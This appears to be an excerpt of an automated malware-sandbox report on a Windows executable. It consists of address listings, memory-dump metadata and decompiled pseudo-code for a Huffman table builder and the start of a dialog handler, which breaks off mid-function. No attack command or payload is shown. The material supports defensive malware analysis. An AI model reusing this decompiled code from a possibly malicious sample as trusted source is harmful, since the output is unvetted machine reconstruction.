                                                            0x004068aa
                                                            0x004068af
                                                            0x004068b5
                                                            0x004068ba
                                                            0x004068bc
                                                            0x004068bc
                                                            0x004068b1
                                                            0x004068b1
                                                            0x004068b1
                                                            0x004068af
                                                            0x00000000
                                                            0x004068cd
                                                            0x004068fa
                                                            0x004068ff
                                                            0x00406901
                                                            0x00406902
                                                            0x00406904
                                                            0x00406905
                                                            0x00406905
                                                            0x00406905
                                                            0x0040692d
                                                            0x00406932
                                                            0x00406932
                                                            0x00000000
                                                            0x00406932
                                                            0x004068cb
                                                            0x00406892
                                                            0x00406835
                                                            0x00406835
                                                            0x00406836
                                                            0x00406880
                                                            0x00000000
                                                            0x00406880
                                                            0x00406838
                                                            0x00406839
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00406995
                                                            0x00406995
                                                            0x00406995
                                                            0x00406998
                                                            0x00000000
                                                            0x00000000
                                                            0x00406975
                                                            0x00406975
                                                            0x00406979
                                                            0x00000000
                                                            0x00000000
                                                            0x0040697f
                                                            0x0040697f
                                                            0x00406982
                                                            0x00406985
                                                            0x0040698a
                                                            0x0040698c
                                                            0x0040698f
                                                            0x00406992
                                                            0x00406992
                                                            0x00406992
                                                            0x0040699a
                                                            0x0040699a
                                                            0x0040699d
                                                            0x0040699f
                                                            0x004069a4
                                                            0x004069a7
                                                            0x004069a9
                                                            0x004069ac
                                                            0x00000000
                                                            0x00000000
                                                            0x004069b2
                                                            0x004069b2
                                                            0x004069b4
                                                            0x00000000
                                                            0x00000000
                                                            0x004069ba
                                                            0x004069ba
                                                            0x004069be
                                                            0x00000000
                                                            0x00000000
                                                            0x004069c4
                                                            0x004069c4
                                                            0x004069c7
                                                            0x004069c9
                                                            0x00406a67
                                                            0x00406a67
                                                            0x00406a6a
                                                            0x00406a6c
                                                            0x00406a6c
                                                            0x00406a6f
                                                            0x00406a72
                                                            0x00406a74
                                                            0x00406a76
                                                            0x00406a78
                                                            0x00406a78
                                                            0x00406a81
                                                            0x00406a86
                                                            0x00406a89
                                                            0x00406a8c
                                                            0x00406a8f
                                                            0x00406a92
                                                            0x00406a92
                                                            0x00406a92
                                                            0x00406a95
                                                            0x00406a9b
                                                            0x00406a9b
                                                            0x00406aa1
                                                            0x00406aa1
                                                            0x00406aa1
                                                            0x00000000
                                                            0x00406a95
                                                            0x004069cf
                                                            0x004069cf
                                                            0x004069d5
                                                            0x004069d8
                                                            0x004069da
                                                            0x00406a05
                                                            0x00406a08
                                                            0x00406a0e
                                                            0x00406a13
                                                            0x00406a19
                                                            0x00406a1f
                                                            0x00406a21
                                                            0x00406a24
                                                            0x00406a2d
                                                            0x00406a33
                                                            0x00406a33
                                                            0x00406a26
                                                            0x00406a28
                                                            0x00406a2a
                                                            0x00406a2a
                                                            0x00406a35
                                                            0x00406a3b
                                                            0x00406a3e
                                                            0x00406a40
                                                            0x00406a42
                                                            0x00406a48
                                                            0x00406a4a
                                                            0x00406a4c
                                                            0x00406a4f
                                                            0x00406a58
                                                            0x00406a58
                                                            0x00406a5a
                                                            0x00406a51
                                                            0x00406a51
                                                            0x00406a54
                                                            0x00406a54
                                                            0x00406a5c
                                                            0x00406a5c
                                                            0x00406a4a
                                                            0x00406a5f
                                                            0x00406a61
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00406a61
                                                            0x004069dc
                                                            0x004069dc
                                                            0x004069e2
                                                            0x004069e8
                                                            0x004069ea
                                                            0x00000000
                                                            0x00000000
                                                            0x004069ec
                                                            0x004069ec
                                                            0x004069ee
                                                            0x004069f0
                                                            0x004069f3
                                                            0x004069fa
                                                            0x004069fa
                                                            0x004069fc
                                                            0x004069f5
                                                            0x004069f5
                                                            0x004069f7
                                                            0x004069f7
                                                            0x004069fe
                                                            0x00406a00
                                                            0x00406a03
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00406b07
                                                            0x00406b0a
                                                            0x00406b0d
                                                            0x00406b13
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00406cea
                                                            0x00406cea
                                                            0x00406cea
                                                            0x00406ced
                                                            0x00406cf0
                                                            0x00406cf2
                                                            0x00406cf5
                                                            0x00406cfb
                                                            0x00406d02
                                                            0x00406d04
                                                            0x00000000
                                                            0x00000000
                                                            0x00406bd8
                                                            0x00406bd8
                                                            0x00406c00
                                                            0x00406c00
                                                            0x00406c00
                                                            0x00406c02
                                                            0x00000000
                                                            0x00000000
                                                            0x00406be0
                                                            0x00406be0
                                                            0x00406be4
                                                            0x00000000
                                                            0x00000000
                                                            0x00406bea
                                                            0x00406bea
                                                            0x00406bed
                                                            0x00406bf0
                                                            0x00406bf3
                                                            0x00406bf5
                                                            0x00406bf7
                                                            0x00406bfa
                                                            0x00406bfd
                                                            0x00406bfd
                                                            0x00406bfd
                                                            0x00406c04
                                                            0x00406c04
                                                            0x00406c0c
                                                            0x00406c0f
                                                            0x00406c15
                                                            0x00406c18
                                                            0x00406c1c
                                                            0x00406c20
                                                            0x00406c23
                                                            0x00406c26
                                                            0x00406c3e
                                                            0x00406c3e
                                                            0x00406c41
                                                            0x00406c4f
                                                            0x00406c52
                                                            0x00406c43
                                                            0x00406c43
                                                            0x00406c45
                                                            0x00406c4c
                                                            0x00406c4c
                                                            0x00406c7b
                                                            0x00406c7b
                                                            0x00406c7b
                                                            0x00406c7e
                                                            0x00406c80
                                                            0x00000000
                                                            0x00000000
                                                            0x00406c5b
                                                            0x00406c5b
                                                            0x00406c5f
                                                            0x00000000
                                                            0x00000000
                                                            0x00406c65
                                                            0x00406c65
                                                            0x00406c68
                                                            0x00406c6b
                                                            0x00406c6e
                                                            0x00406c70
                                                            0x00406c72
                                                            0x00406c75
                                                            0x00406c78
                                                            0x00406c78
                                                            0x00406c78
                                                            0x00406c82
                                                            0x00406c82
                                                            0x00406c84
                                                            0x00406c86
                                                            0x00406c91
                                                            0x00406c94
                                                            0x00406c97
                                                            0x00406c99
                                                            0x00406c9b
                                                            0x00406c9d
                                                            0x00406ca0
                                                            0x00406ca3
                                                            0x00406ca8
                                                            0x00406cab
                                                            0x00406cae
                                                            0x00406cb1
                                                            0x00406cb8
                                                            0x00406cbb
                                                            0x00406cbd
                                                            0x00000000
                                                            0x00000000
                                                            0x00406cc3
                                                            0x00406cc3
                                                            0x00406cc7
                                                            0x00406cd8
                                                            0x00406cd8
                                                            0x00406cd8
                                                            0x00406cda
                                                            0x00406cda
                                                            0x00406cde
                                                            0x00406cde
                                                            0x00406cde
                                                            0x00406ce0
                                                            0x00406ce1
                                                            0x00406ce4
                                                            0x00406ce4
                                                            0x00406ce4
                                                            0x00406ce7
                                                            0x00000000
                                                            0x00406ce7
                                                            0x00406cc9
                                                            0x00406cc9
                                                            0x00406ccc
                                                            0x00000000
                                                            0x00000000
                                                            0x00406cd2
                                                            0x00406cd2
                                                            0x00000000
                                                            0x00406cd2
                                                            0x00406c28
                                                            0x00406c28
                                                            0x00406c2a
                                                            0x00406c2c
                                                            0x00406c2f
                                                            0x00406c32
                                                            0x00406c36
                                                            0x00406c36
                                                            0x00406d0a
                                                            0x00406d0a
                                                            0x00406d0d
                                                            0x00406d14
                                                            0x00406d18
                                                            0x00406d1a
                                                            0x00406d1d
                                                            0x00406d20
                                                            0x00406d25
                                                            0x00406d28
                                                            0x00406d2a
                                                            0x00406d2b
                                                            0x00406d2e
                                                            0x00406d39
                                                            0x00406d3c
                                                            0x00406d53
                                                            0x00406d58
                                                            0x00406d5f
                                                            0x00406d64
                                                            0x00406d68
                                                            0x00406d6a
                                                            0x00406d6a
                                                            0x00406d6a
                                                            0x00406d6d
                                                            0x00406d6f
                                                            0x00000000
                                                            0x00406d75
                                                            0x00406d75
                                                            0x00406d79
                                                            0x00406d84
                                                            0x00406d97
                                                            0x00406d9c
                                                            0x00406da1
                                                            0x00406da3
                                                            0x00000000
                                                            0x00000000
                                                            0x00406da9
                                                            0x00406da9
                                                            0x00406dac
                                                            0x00406dae
                                                            0x00406dbc
                                                            0x00406dbc
                                                            0x00406dbf
                                                            0x00406dbf
                                                            0x00406dc2
                                                            0x00406dc5
                                                            0x00406dc8
                                                            0x00406dcb
                                                            0x00406dce
                                                            0x00406dd1
                                                            0x00000000
                                                            0x00406dd1
                                                            0x00406db0
                                                            0x00406db0
                                                            0x00406db6
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00406db6
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00407155
                                                            0x00407155
                                                            0x0040715b
                                                            0x00407161
                                                            0x00407166
                                                            0x0040716c
                                                            0x00407172
                                                            0x00407174
                                                            0x00407177
                                                            0x00407180
                                                            0x00407186
                                                            0x00407186
                                                            0x00407179
                                                            0x0040717b
                                                            0x0040717d
                                                            0x0040717d
                                                            0x00407188
                                                            0x0040718a
                                                            0x0040718d
                                                            0x004071c8
                                                            0x004071c8
                                                            0x00000000
                                                            0x0040718f
                                                            0x0040718f
                                                            0x0040718f
                                                            0x00407195
                                                            0x00407198
                                                            0x0040719a
                                                            0x004071cf
                                                            0x004071d1
                                                            0x00000000
                                                            0x004071d1
                                                            0x00000000
                                                            0x0040719a
                                                            0x00000000
                                                            0x004067d9
                                                            0x004071a7
                                                            0x00000000
                                                            0x004071a7
                                                            0x00406bbb
                                                            0x00406bbd
                                                            0x00000000
                                                            0x00000000
                                                            0x00406bbf
                                                            0x00406bbf
                                                            0x00406bc2
                                                            0x00000000
                                                            0x00406bc2
                                                            0x00406b07
                                                            0x00406ac8
                                                            0x004071ac
                                                            0x004071af
                                                            0x004071b1
                                                            0x004071ba
                                                            0x004071c0
                                                            0x00000000

                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.1283222796.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000009.00000002.1283213930.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283260638.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.0000000000410000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.0000000000414000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.0000000000438000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.0000000000448000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.000000000045B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.000000000047D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.000000000047F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.00000000004BB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.00000000004F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283521705.00000000004F7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_400000_file.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 1141b8caf72e3132df9e3aa140a50eda8930c9371ed3a7f86c2d2c6764d1ec0e
                                                            • Instruction ID: c3f2784b42629965e79a9deb6a6c5a882cbc70a40949ec996fd179ba06f8b65e
                                                            • Opcode Fuzzy Hash: 1141b8caf72e3132df9e3aa140a50eda8930c9371ed3a7f86c2d2c6764d1ec0e
                                                            • Instruction Fuzzy Hash: EBE1BB71904719DFDB24CF58C880BAAB7F1FB45305F11852EE497A72C1E738AA91CB54
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0040727F Relevance: .3, Instructions: 300COMMONCrypto
                                                            Download Yara Rule
                                                            C-Code - Quality: 100%
                                                            			E0040727F(signed char _a4, char _a5, short _a6, signed int _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, signed int* _a24, signed int _a28, intOrPtr _a32, signed int* _a36) {
				signed int _v8;
				unsigned int _v12;
				signed int _v16;
				intOrPtr _v20;
				signed int _v24;
				signed int _v28;
				intOrPtr* _v32;
				signed int* _v36;
				signed int _v40;
				signed int _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				void _v116;
				signed int _v176;
				signed int _v180;
				signed int _v240;
				signed int _t166;
				signed int _t168;
				intOrPtr _t175;
				signed int _t181;
				void* _t182;
				intOrPtr _t183;
				signed int* _t184;
				signed int _t186;
				signed int _t187;
				signed int* _t189;
				signed int _t190;
				intOrPtr* _t191;
				intOrPtr _t192;
				signed int _t193;
				signed int _t195;
				signed int _t200;
				signed int _t205;
				void* _t207;
				short _t208;
				signed char _t222;
				signed int _t224;
				signed int _t225;
				signed int* _t232;
				signed int _t233;
				signed int _t234;
				void* _t235;
				signed int _t236;
				signed int _t244;
				signed int _t246;
				signed int _t251;
				signed int _t254;
				signed int _t256;
				signed int _t259;
				signed int _t262;
				void* _t263;
				void* _t264;
				signed int _t267;
				intOrPtr _t269;
				intOrPtr _t271;
				signed int _t274;
				intOrPtr* _t275;
				unsigned int _t276;
				void* _t277;
				signed int _t278;
				intOrPtr* _t279;
				signed int _t281;
				intOrPtr _t282;
				intOrPtr _t283;
				signed int* _t284;
				signed int _t286;
				signed int _t287;
				signed int _t288;
				signed int _t296;
				signed int* _t297;
				intOrPtr _t298;
				void* _t299;

				_t278 = _a8;
				_t187 = 0x10;
				memset( &_v116, 0, _t187 << 2);
				_t189 = _a4;
				_t233 = _t278;
				do {
					_t166 =  *_t189;
					_t189 =  &(_t189[1]);
					 *((intOrPtr*)(_t299 + _t166 * 4 - 0x70)) =  *((intOrPtr*)(_t299 + _t166 * 4 - 0x70)) + 1;
					_t233 = _t233 - 1;
				} while (_t233 != 0);
				if(_v116 != _t278) {
					_t279 = _a28;
					_t267 =  *_t279;
					_t190 = 1;
					_a28 = _t267;
					_t234 = 0xf;
					while(1) {
						_t168 = 0;
						if( *((intOrPtr*)(_t299 + _t190 * 4 - 0x70)) != 0) {
							break;
						}
						_t190 = _t190 + 1;
						if(_t190 <= _t234) {
							continue;
						}
						break;
					}
					_v8 = _t190;
					if(_t267 < _t190) {
						_a28 = _t190;
					}
					while( *((intOrPtr*)(_t299 + _t234 * 4 - 0x70)) == _t168) {
						_t234 = _t234 - 1;
						if(_t234 != 0) {
							continue;
						}
						break;
					}
					_v28 = _t234;
					if(_a28 > _t234) {
						_a28 = _t234;
					}
					 *_t279 = _a28;
					_t181 = 1 << _t190;
					while(_t190 < _t234) {
						_t182 = _t181 -  *((intOrPtr*)(_t299 + _t190 * 4 - 0x70));
						if(_t182 < 0) {
							L64:
							return _t168 | 0xffffffff;
						}
						_t190 = _t190 + 1;
						_t181 = _t182 + _t182;
					}
					_t281 = _t234 << 2;
					_t191 = _t299 + _t281 - 0x70;
					_t269 =  *_t191;
					_t183 = _t181 - _t269;
					_v52 = _t183;
					if(_t183 < 0) {
						goto L64;
					}
					_v176 = _t168;
					 *_t191 = _t269 + _t183;
					_t192 = 0;
					_t235 = _t234 - 1;
					if(_t235 == 0) {
						L21:
						_t184 = _a4;
						_t271 = 0;
						do {
							_t193 =  *_t184;
							_t184 =  &(_t184[1]);
							if(_t193 != _t168) {
								_t232 = _t299 + _t193 * 4 - 0xb0;
								_t236 =  *_t232;
								 *((intOrPtr*)(0x4496a8 + _t236 * 4)) = _t271;
								 *_t232 = _t236 + 1;
							}
							_t271 = _t271 + 1;
						} while (_t271 < _a8);
						_v16 = _v16 | 0xffffffff;
						_v40 = _v40 & 0x00000000;
						_a8 =  *((intOrPtr*)(_t299 + _t281 - 0xb0));
						_t195 = _v8;
						_t186 =  ~_a28;
						_v12 = _t168;
						_v180 = _t168;
						_v36 = 0x4496a8;
						_v240 = _t168;
						if(_t195 > _v28) {
							L62:
							_t168 = 0;
							if(_v52 == 0 || _v28 == 1) {
								return _t168;
							} else {
								goto L64;
							}
						}
						_v44 = _t195 - 1;
						_v32 = _t299 + _t195 * 4 - 0x70;
						do {
							_t282 =  *_v32;
							if(_t282 == 0) {
								goto L61;
							}
							while(1) {
								_t283 = _t282 - 1;
								_t200 = _a28 + _t186;
								_v48 = _t283;
								_v24 = _t200;
								if(_v8 <= _t200) {
									goto L45;
								}
								L31:
								_v20 = _t283 + 1;
								do {
									_v16 = _v16 + 1;
									_t296 = _v28 - _v24;
									if(_t296 > _a28) {
										_t296 = _a28;
									}
									_t222 = _v8 - _v24;
									_t254 = 1 << _t222;
									if(1 <= _v20) {
										L40:
										_t256 =  *_a36;
										_t168 = 1 << _t222;
										_v40 = 1;
										_t274 = _t256 + 1;
										if(_t274 > 0x5a0) {
											goto L64;
										}
									} else {
										_t275 = _v32;
										_t263 = _t254 + (_t168 | 0xffffffff) - _v48;
										if(_t222 >= _t296) {
											goto L40;
										}
										while(1) {
											_t222 = _t222 + 1;
											if(_t222 >= _t296) {
												goto L40;
											}
											_t275 = _t275 + 4;
											_t264 = _t263 + _t263;
											_t175 =  *_t275;
											if(_t264 <= _t175) {
												goto L40;
											}
											_t263 = _t264 - _t175;
										}
										goto L40;
									}
									_t168 = _a32 + _t256 * 4;
									_t297 = _t299 + _v16 * 4 - 0xec;
									 *_a36 = _t274;
									_t259 = _v16;
									 *_t297 = _t168;
									if(_t259 == 0) {
										 *_a24 = _t168;
									} else {
										_t276 = _v12;
										_t298 =  *((intOrPtr*)(_t297 - 4));
										 *(_t299 + _t259 * 4 - 0xb0) = _t276;
										_a5 = _a28;
										_a4 = _t222;
										_t262 = _t276 >> _t186;
										_a6 = (_t168 - _t298 >> 2) - _t262;
										 *(_t298 + _t262 * 4) = _a4;
									}
									_t224 = _v24;
									_t186 = _t224;
									_t225 = _t224 + _a28;
									_v24 = _t225;
								} while (_v8 > _t225);
								L45:
								_t284 = _v36;
								_a5 = _v8 - _t186;
								if(_t284 < 0x4496a8 + _a8 * 4) {
									_t205 =  *_t284;
									if(_t205 >= _a12) {
										_t207 = _t205 - _a12 + _t205 - _a12;
										_v36 =  &(_v36[1]);
										_a4 =  *((intOrPtr*)(_t207 + _a20)) + 0x50;
										_t208 =  *((intOrPtr*)(_t207 + _a16));
									} else {
										_a4 = (_t205 & 0xffffff00 | _t205 - 0x00000100 > 0x00000000) - 0x00000001 & 0x00000060;
										_t208 =  *_t284;
										_v36 =  &(_t284[1]);
									}
									_a6 = _t208;
								} else {
									_a4 = 0xc0;
								}
								_t286 = 1 << _v8 - _t186;
								_t244 = _v12 >> _t186;
								while(_t244 < _v40) {
									 *(_t168 + _t244 * 4) = _a4;
									_t244 = _t244 + _t286;
								}
								_t287 = _v12;
								_t246 = 1 << _v44;
								while((_t287 & _t246) != 0) {
									_t287 = _t287 ^ _t246;
									_t246 = _t246 >> 1;
								}
								_t288 = _t287 ^ _t246;
								_v20 = 1;
								_v12 = _t288;
								_t251 = _v16;
								if(((1 << _t186) - 0x00000001 & _t288) ==  *((intOrPtr*)(_t299 + _t251 * 4 - 0xb0))) {
									L60:
									if(_v48 != 0) {
										_t282 = _v48;
										_t283 = _t282 - 1;
										_t200 = _a28 + _t186;
										_v48 = _t283;
										_v24 = _t200;
										if(_v8 <= _t200) {
											goto L45;
										}
										goto L31;
									}
									break;
								} else {
									goto L58;
								}
								do {
									L58:
									_t186 = _t186 - _a28;
									_t251 = _t251 - 1;
								} while (((1 << _t186) - 0x00000001 & _v12) !=  *((intOrPtr*)(_t299 + _t251 * 4 - 0xb0)));
								_v16 = _t251;
								goto L60;
							}
							L61:
							_v8 = _v8 + 1;
							_v32 = _v32 + 4;
							_v44 = _v44 + 1;
						} while (_v8 <= _v28);
						goto L62;
					}
					_t277 = 0;
					do {
						_t192 = _t192 +  *((intOrPtr*)(_t299 + _t277 - 0x6c));
						_t277 = _t277 + 4;
						_t235 = _t235 - 1;
						 *((intOrPtr*)(_t299 + _t277 - 0xac)) = _t192;
					} while (_t235 != 0);
					goto L21;
				}
				 *_a24 =  *_a24 & 0x00000000;
				 *_a28 =  *_a28 & 0x00000000;
				return 0;
			}











































































                                                            0x0040728a
                                                            0x00407292
                                                            0x00407296
                                                            0x00407298
                                                            0x0040729b
                                                            0x0040729d
                                                            0x0040729d
                                                            0x0040729f
                                                            0x004072a6
                                                            0x004072a8
                                                            0x004072a8
                                                            0x004072ae
                                                            0x004072c3
                                                            0x004072cb
                                                            0x004072cd
                                                            0x004072cf
                                                            0x004072d2
                                                            0x004072d3
                                                            0x004072d3
                                                            0x004072d9
                                                            0x00000000
                                                            0x00000000
                                                            0x004072db
                                                            0x004072de
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x004072de
                                                            0x004072e2
                                                            0x004072e5
                                                            0x004072e7
                                                            0x004072e7
                                                            0x004072ea
                                                            0x004072f0
                                                            0x004072f1
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x004072f1
                                                            0x004072f6
                                                            0x004072f9
                                                            0x004072fb
                                                            0x004072fb
                                                            0x00407301
                                                            0x00407303
                                                            0x00407314
                                                            0x00407307
                                                            0x0040730b
                                                            0x004075b0
                                                            0x00000000
                                                            0x004075b0
                                                            0x00407311
                                                            0x00407312
                                                            0x00407312
                                                            0x0040731a
                                                            0x0040731d
                                                            0x00407321
                                                            0x00407323
                                                            0x00407325
                                                            0x00407328
                                                            0x00000000
                                                            0x00000000
                                                            0x00407330
                                                            0x00407336
                                                            0x00407338
                                                            0x0040733a
                                                            0x0040733b
                                                            0x00407350
                                                            0x00407350
                                                            0x00407353
                                                            0x00407355
                                                            0x00407355
                                                            0x00407357
                                                            0x0040735c
                                                            0x0040735e
                                                            0x00407365
                                                            0x00407367
                                                            0x0040736f
                                                            0x0040736f
                                                            0x00407371
                                                            0x00407372
                                                            0x00407381
                                                            0x00407385
                                                            0x00407389
                                                            0x0040738c
                                                            0x0040738f
                                                            0x00407394
                                                            0x00407397
                                                            0x0040739d
                                                            0x004073a4
                                                            0x004073aa
                                                            0x004075a3
                                                            0x004075a3
                                                            0x004075a8
                                                            0x004075b7
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x004075a8
                                                            0x004073b7
                                                            0x004073ba
                                                            0x004073bd
                                                            0x004073c0
                                                            0x004073c4
                                                            0x00000000
                                                            0x00000000
                                                            0x004073cf
                                                            0x004073d2
                                                            0x004073d3
                                                            0x004073d5
                                                            0x004073db
                                                            0x004073de
                                                            0x00000000
                                                            0x00000000
                                                            0x004073e4
                                                            0x004073e5
                                                            0x004073e8
                                                            0x004073eb
                                                            0x004073ee
                                                            0x004073f4
                                                            0x004073f6
                                                            0x004073f6
                                                            0x004073fe
                                                            0x00407402
                                                            0x00407407
                                                            0x0040742c
                                                            0x00407432
                                                            0x00407434
                                                            0x00407436
                                                            0x00407439
                                                            0x00407442
                                                            0x00000000
                                                            0x00000000
                                                            0x00407409
                                                            0x00407409
                                                            0x00407412
                                                            0x00407416
                                                            0x00000000
                                                            0x00000000
                                                            0x00407427
                                                            0x00407427
                                                            0x0040742a
                                                            0x00000000
                                                            0x00000000
                                                            0x0040741a
                                                            0x0040741d
                                                            0x0040741f
                                                            0x00407423
                                                            0x00000000
                                                            0x00000000
                                                            0x00407425
                                                            0x00407425
                                                            0x00000000
                                                            0x00407427
                                                            0x0040744b
                                                            0x00407451
                                                            0x0040745b
                                                            0x0040745d
                                                            0x00407462
                                                            0x00407464
                                                            0x0040749a
                                                            0x00407466
                                                            0x00407466
                                                            0x00407469
                                                            0x0040746c
                                                            0x00407476
                                                            0x00407479
                                                            0x00407480
                                                            0x0040748b
                                                            0x00407492
                                                            0x00407492
                                                            0x0040749c
                                                            0x0040749f
                                                            0x004074a1
                                                            0x004074a7
                                                            0x004074a7
                                                            0x004074b0
                                                            0x004074b3
                                                            0x004074b8
                                                            0x004074c7
                                                            0x004074cf
                                                            0x004074d4
                                                            0x004074f8
                                                            0x00407500
                                                            0x00407504
                                                            0x0040750a
                                                            0x004074d6
                                                            0x004074e4
                                                            0x004074e7
                                                            0x004074ed
                                                            0x004074ed
                                                            0x0040750e
                                                            0x004074c9
                                                            0x004074c9
                                                            0x004074c9
                                                            0x0040751f
                                                            0x00407523
                                                            0x0040752f
                                                            0x0040752a
                                                            0x0040752d
                                                            0x0040752d
                                                            0x00407537
                                                            0x0040753c
                                                            0x00407544
                                                            0x00407540
                                                            0x00407542
                                                            0x00407542
                                                            0x0040754a
                                                            0x0040754c
                                                            0x00407553
                                                            0x0040755d
                                                            0x00407567
                                                            0x00407583
                                                            0x00407587
                                                            0x004073cc
                                                            0x004073d2
                                                            0x004073d3
                                                            0x004073d5
                                                            0x004073db
                                                            0x004073de
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x004073de
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00407569
                                                            0x00407569
                                                            0x00407569
                                                            0x0040756e
                                                            0x00407577
                                                            0x00407580
                                                            0x00000000
                                                            0x00407580
                                                            0x0040758d
                                                            0x0040758d
                                                            0x00407590
                                                            0x00407597
                                                            0x0040759a
                                                            0x00000000
                                                            0x004073bd
                                                            0x0040733d
                                                            0x0040733f
                                                            0x0040733f
                                                            0x00407343
                                                            0x00407346
                                                            0x00407347
                                                            0x00407347
                                                            0x00000000
                                                            0x0040733f
                                                            0x004072b3
                                                            0x004072b9
                                                            0x00000000

                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.1283222796.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000009.00000002.1283213930.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283260638.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.0000000000410000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.0000000000414000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.0000000000438000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.0000000000448000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.000000000045B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.000000000047D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.000000000047F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.00000000004BB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.00000000004F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283521705.00000000004F7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_400000_file.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: c7f0ca315d4942290e4845dc22ac506fa28f6714ce5458d8b639d44a854dd49c
                                                            • Instruction ID: 0ca4a47b5fc6764e995cd925f966ceec75b0dec410f7dca902c933a8aa8fc986
                                                            • Opcode Fuzzy Hash: c7f0ca315d4942290e4845dc22ac506fa28f6714ce5458d8b639d44a854dd49c
                                                            • Instruction Fuzzy Hash: 0FC13631E042199BCF18CF68D8905EEBBB2FF89314F25866AD85677380D734A942CB95
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00404CD9 Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 491windowmemoryCOMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 96%
                                                            			E00404CD9(struct HWND__* _a4, int _a8, signed int _a12, int _a16) {
				struct HWND__* _v8;
				struct HWND__* _v12;
				long _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				signed char* _v32;
				int _v36;
				signed int _v44;
				int _v48;
				signed int* _v60;
				signed char* _v64;
				signed int _v68;
				long _v72;
				void* _v76;
				intOrPtr _v80;
				intOrPtr _v84;
				void* _v88;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t203;
				intOrPtr _t206;
				long _t212;
				signed int _t216;
				signed int _t227;
				void* _t230;
				void* _t231;
				int _t237;
				long _t242;
				long _t243;
				signed int _t244;
				signed int _t250;
				signed int _t252;
				signed char _t253;
				signed char _t259;
				void* _t264;
				void* _t266;
				signed char* _t284;
				signed char _t285;
				long _t290;
				signed int _t300;
				signed int _t308;
				signed char* _t316;
				int _t320;
				int _t321;
				signed int* _t322;
				int _t323;
				long _t324;
				signed int _t325;
				long _t327;
				int _t328;
				signed int _t329;
				void* _t331;

				_v12 = GetDlgItem(_a4, 0x3f9);
				_v8 = GetDlgItem(_a4, 0x408);
				_t331 = SendMessageA;
				_v24 =  *0x452448;
				_v28 =  *0x452430 + 0x94;
				_t320 = 0x10;
				if(_a8 != 0x110) {
					L23:
